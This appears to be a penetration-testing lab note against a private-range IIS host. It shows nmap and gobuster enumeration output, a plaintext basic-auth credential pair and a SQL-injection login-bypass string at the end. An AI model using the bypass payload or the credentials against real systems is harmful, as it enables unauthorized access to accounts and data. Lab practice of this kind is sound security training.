Nmap
└─$ cat all_ports.nmap
# Nmap 7.93 scan initiated Sat Dec 17 15:57:12 2022 as: nmap -sC -sV -p- -oA nmap/all_ports 10.10.110.124
Nmap scan report for localhost (10.10.110.124)
Host is up (0.032s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
**80/tcp open http Microsoft IIS httpd 10.0**
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Offshore Dev
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 17 15:59:33 2022 -- 1 IP address (1 host up) scanned in 140.79 seconds
└─$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u 10.10.110.124 -x txt,asp,php
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.110.124
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: txt,asp,php
[+] Timeout: 10s
===============================================================
2023/04/09 01:14:11 Starting gobuster in directory enumeration mode
===============================================================
/contact (Status: 500) [Size: 3420]
/about (Status: 500) [Size: 3420]
/default (Status: 500) [Size: 3420]
/login (Status: 401) [Size: 1293]
/content (Status: 301) [Size: 152] [--> http://10.10.110.124/content/]
/Default (Status: 500) [Size: 3420]
/scripts (Status: 301) [Size: 152] [--> http://10.10.110.124/scripts/]
/Contact (Status: 500) [Size: 3420]
/About (Status: 500) [Size: 3420]
/license.txt (Status: 200) [Size: 1096]
/Login (Status: 401) [Size: 1293]
/Content (Status: 301) [Size: 152] [--> http://10.10.110.124/Content/]
/flag.txt (Status: 200) [Size: 35]
/fonts (Status: 301) [Size: 150] [--> http://10.10.110.124/fonts/]
/dashboard (Status: 302) [Size: 123] [--> /Login]
/LICENSE.txt (Status: 200) [Size: 1096]
/Scripts (Status: 301) [Size: 152] [--> http://10.10.110.124/Scripts/]
/Fonts (Status: 301) [Size: 150] [--> http://10.10.110.124/Fonts/]
/License.txt (Status: 200) [Size: 1096]
/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
/Dashboard (Status: 302) [Size: 123] [--> /Login]
/http%3A%2F%2Fwww (Status: 400) [Size: 3420]
/CONTACT (Status: 500) [Size: 3420]
/http%3A (Status: 400) [Size: 3420]
/q%26a (Status: 400) [Size: 3420]
/**http%3a (Status: 400) [Size: 3420]
Progress: 147711 / 882244 (16.74%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/04/09 01:22:35 Finished
===============================================================
Initial Basic Auth
User: svc_iis Pass: Vintage!
Bypass Authentication
admin’OR’1’=‘1